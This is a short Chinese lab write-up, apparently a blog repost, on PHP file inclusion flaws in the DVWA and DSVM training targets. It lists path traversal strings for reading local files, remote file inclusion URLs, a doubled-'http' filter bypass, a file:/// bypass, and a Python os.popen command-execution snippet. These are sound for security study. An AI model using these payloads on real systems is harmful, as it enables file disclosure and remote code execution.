文件包含-笔记

Posted EnderZhou

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了文件包含-笔记相关的知识,希望对你有一定的参考价值。

php为例 就可以使用 include     require 来进行文件包含操作。目的是引用其他的文件、代码。
 
当文件包含函数的参数用户可控是可以引用恶意代码。
 
DVWA_1.9此漏洞模块需要开启 allow_url_include功能。
PHPstudy开启功能位置:其他选项菜单-php扩展及设置-参数开关设置-allow_url_include勾选即可。
 
技术分享
观察网页发现几个file1.php file2.php file3.php的URL区别仅为 page后跟的参数不同。
 
技术分享
通过使用test.php 尝试后报错。可以发现服务器尝试查找test.php文件,此参数可控。另外报错爆出此页面的绝对路径。
 
 
LOW
技术分享
使用 ../../php.ini 读取文件内容
 
使用  ../../phpinfo.php 执行相应php代码
 
使用  http://127.0.0.1/phpinfo.txt 执行远程代码文件
非php文件内包含php代码也可以执行
 
使用  http://127.0.0.1/phpinfo.php 代码在攻击者的web服务器上执行了 与我们的期望不服,所以
使用  http://127.0.0.1/phpinfo.txt才能达到我们想要的执行远程代码文件的目的。
 
medium.
..\..\php.ini 读取文件内容
hthttp://tp://127.0.0.1/phpinfo.txt  执行远程代码文件
 
high
发现 page只接受file开头的字符串作为参数。
使用file://本地文件传送协议即可绕过 读取本地文件
file:///C:\phpStudy\WWW\phpinfo.txt
 
由于file://无法读取远程文件所以需要配合文件上传漏洞来执行恶意代码
 
 
DSVM
技术分享
注意DSVM系统是python编写的,远程文件包含的代码也必须是python的,不熟悉python代码的同学可以使用下面的示例:
import os
output = os.popen(‘ipconfig‘)
print output.read()
将其命名成cmd.txt
 

以上是关于文件包含-笔记的主要内容,如果未能解决你的问题,请参考以下文章

笔记网易微专业-Web安全工程师-04.WEB安全实战-5.文件包含

(2020上半年第23天(其他漏洞-文件包含))小迪网络安全笔记

DVWA学习笔记--03--File Inclusion

个人学习笔记——会话

shell脚本学习-文件包含

GNU工具链学习笔记